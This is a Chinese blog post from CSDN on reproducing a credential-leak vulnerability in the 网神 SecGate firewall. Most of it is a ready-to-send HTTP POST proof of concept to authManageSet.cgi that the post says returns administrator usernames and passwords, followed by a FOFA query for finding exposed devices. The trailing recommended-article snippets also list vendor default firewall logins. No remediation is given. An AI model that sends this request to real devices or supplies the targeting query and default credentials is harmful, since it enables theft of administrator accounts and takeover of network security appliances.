网神防火墙后台用户登录账号泄露漏洞复现

已于 2023-12-19 17:33:51 修改
阅读量1.2k 收藏 10
点赞数 11
分类专栏: web安全 文章标签: 安全 web安全 网络
于 2023-12-19 17:02:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44862511/article/details/135088955
版权

1.简介

网神防火墙是一款中国知名网络安全公司启明星辰开发的防火墙产品。它提供了全面的网络安全防护功能,旨在保护企业网络免受各种网络威胁和攻击.

该产品存在用户账号信息泄露漏洞,通过构造特定数据包,获取防火墙管理员登录的账号密码.

2.漏洞描述

网神防火墙用户账号信息泄露漏洞,通过构造特定数据包,获取防火墙管理员登录的账号密码。

3.漏洞复现

POC

POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1
Host: xx.xxx.xxx.xx:8889
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 77
Origin: http://xx.xxx.xxx.xx:8889
Connection: close
Referer: http://xx.xxx.xxx.xx:8889/index.html

type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc

 修改请求行以及请求参数就可以直接获取到管理员账号密码.

4.网络空间搜索引擎搜索

fofa查询

body="sec_gate_image/login_02.gif"

网神 SecGate 3600 防火墙任意文件上传漏洞
holyxp的博客
08-11 816
网神SecGate3600下一代极速防火墙(NSG系列)是基于完全自主研发、经受市场检验的成熟稳定网神第三代SecOS操作系统 并且在专业防火墙、VPN、IPS的多年产品经验积累基础上精心研发的高性能下一代防火墙 专门为运营商、政府、军队、教育、大型企业、中小型企业的互联网出口打造的集防火墙、抗DDoS攻击、VPN、内容过滤、IPS、带宽管理、用户认证等多项安全技术于一身的主动防御智能安全网关。
漏洞复现网神-SecGate-3600防火墙-sec_ssl-任意文件上传
知黑而守白
01-18 361
网神 SecGate3600 防火墙(以下简称为:防火墙)是奇安信集团自主创新的新一代防火墙安全系统,基于 NDR(基于网络的检测与响应)安全体系,在高性能和先进架构的支撑下,集成了防火墙、VPN、应用与身份识别、防病毒、入侵防御、虚拟系统、行为管理、应用层内容安全防护、威胁情报等综合安全防御功能,并支持与天眼、终端管理系统、NGSOC、天御云等多系统进行协同防御。网神 SecGate3600 防火墙某接口处存在文件上传漏洞,攻击者可以通过构特殊的数据包上传恶意代码文件到系统,从而带来严重安全威胁。
奇安信网神任意文件上传漏洞
qq_36334672的博客
02-04 828
奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传漏洞
奇安信常见安全漏洞及修复
qiaosaifei的博客
01-10 6088
奇安信常见安全漏洞问题及修复
防火墙漏洞
不光要学,知识要能说出口
04-26 4177
2016年至今,网络设备的安全问题一直是一个相当热门的话题,特别是8月影子经纪人的黑客入侵方程式组织获取到的攻击工具,网络设备的安全就像黑夜中的曙光,慢慢吸引我们的注意。接下来我们就来了解下近年来热门的网络设备漏洞:Fortigate 2016 年 1 月 12 日,国外安全研究员esizkur爆料 FortiGate 防火墙存在一个后门,攻击者可以通过这个后门直接获取防火墙控制权限。影响范围:F
各厂商防火墙初始登录IP及密码信息
热门推荐
Jian Sun_的博客
08-17 6万+
1. 天融信 登录地址:https://192.168.1.254 用户名:superman 密码:talent或talent!23 技术支持热线 8008105119 2. 联想网域 需要证书(最好用IE浏览器登录登录地址:https://10.1.5.254:8889 用户名:admin 密码:leadsec@7766、 用户名:administrator 密码:bane@7766 技术支持热线:4008107766、010-56632666 3. 深信服 登录地址:h
防火墙之入侵检测
weixin_54111663的博客
03-28 2421
1. 入侵检测介绍 (1)入侵检测概念:通过监视各种操作,分析,审计各种数据和现象来实时检测入侵行为的过程,它是一种积极的动态的安全防御技术 (2)入侵检测系统(IDS):用于入侵检测的所有软硬件系统,发现有违反安全策略的行为或系统存在被攻击的痕迹,立即启用有关安全机制进行应对
网神防火墙后台用户敏感信息泄露漏洞复现
The current road is different, love needs to distinguish between right and wrong
12-18 850
网神防火墙是一款由中国知名网络安全公司启明星辰开发的防火墙产品。它提供了全面的网络安全防护功能,旨在保护企业网络免受各种网络威胁和攻击。该产品存在用户账号信息泄露漏洞,通过构造特定数据包,获取防火墙管理员登录账号密码。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
漏洞复现-网神SecGate3600防火墙敏感信息泄露漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-16 1216
漏洞复现-网神SecGate3600防火墙敏感信息泄露漏洞,附带自己写的poc脚本
网神 SecGate3600 authManageSet.cgi信息泄露漏洞
weixin_43567873的博客
03-09 126
网神 SecGate3600 authManageSet.cgi信息泄露漏洞
360网神防火墙系统(NSG系列)功能配置及维护手册【V17.08.01】【6B】
04-20
360网神防火墙系统(NSG系列)功能配置及维护手册【V17.08.01】【6B】
360网神WEB配置手册
11-17
该手册主要介绍360新一代智慧防火墙WEB管理界支持的各项功能及配置管理,适用于360新一代智慧防火墙全系列产品,适用于负责配置和维护防火墙安全管理员
谈谈对后台登陆页面的渗透测试
09-10 2325
前言 有些朋友在渗透时扫描到后台登陆界面,却不知道如何入手。最近刚好在某公司做安全顾问,对目标固定的系统渗透有些体会。因此这里讲一下对网站后台登陆界面的渗透思路,希望能为大家提供一些帮助。 开始 本人在进入登陆界面时,一般都是先用万能密码什么的测下输入框有没有注入(现在很少见了)。如果没有,那就先拿admin,123456什么的测试下弱口令,不求运气爆棚一下就猜到密码。主要是...
2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)
08-21 4468
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更新到91个漏洞,本文会实时更新,有新的漏洞都会加上
最全常见Web安全漏洞总结及推荐解决方案
qq_42552574的博客
12-18 8601
常见Web安全漏洞总结及推荐解决方案1.SQL注入:2.不安全的会话管理漏洞:3.任意文件上传:4.任意文件读取:5.任意代码执行:6.越权访问:7.敏感信息泄露:8.XSS跨站脚本攻击:9.CSRF跨站请求伪造:10.用户名/口令暴力爆破:11.弱口令漏洞:12.撞库攻击:13.注册模块设计缺陷:14.短信接口设计缺陷:15.URL重定向漏洞:16.拒绝服务漏洞:17.不足的日志记录和监控:18.业务逻辑漏洞:19.资源控制(预警级别,非漏洞级别)20.网络安全通信协议: 1.SQL注入: SQL注入(
Web漏洞-敏感信息泄露-后台地址爆破
fzy2003的博客
07-06 2247
虽然后台地址泄露无法对网站造成直接威胁,但是后台地址泄露以后能够把网站一些敏感信息暴露,从而增加被攻击的风险。
网神防火墙后台用户登录账号泄露漏洞复现_qax 网神智慧防火墙漏洞(3)
最新发布
2401_84139728的博客
04-09 769
q=0.3,en;q=0.2修改请求行以及请求参数就可以直接获取到管理员账号密码.
黑客10种绕过防火墙方法
03-20 8965
SSL/TLS隧道:SSL(Secure Sockets Layer)/TLS(Transport Layer Security)隧道是通过SSL/TLS协议建立的安全通信隧道,用于在客户端和服务器之间建立加密的通信连接。在分段攻击中,攻击者通过发送特制的网络数据包,利用目标系统对数据包的处理逻辑漏洞,实现对目标系统的攻击。中间人攻击:攻击者将自己的IP地址伪装成受害者或者目标服务器的IP地址,从而使得通信的两端都误以为与对方直接通信,而实际上数据包都经过了攻击者的中间节点,攻击者窃取或篡改通信内容。
Apache Flink (最新版本) 远程代码执行
善恶终有报,天道好轮回;不信抬头看,苍天饶过谁
05-04 959
路虽远,行则将至;事虽难,做则必成
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值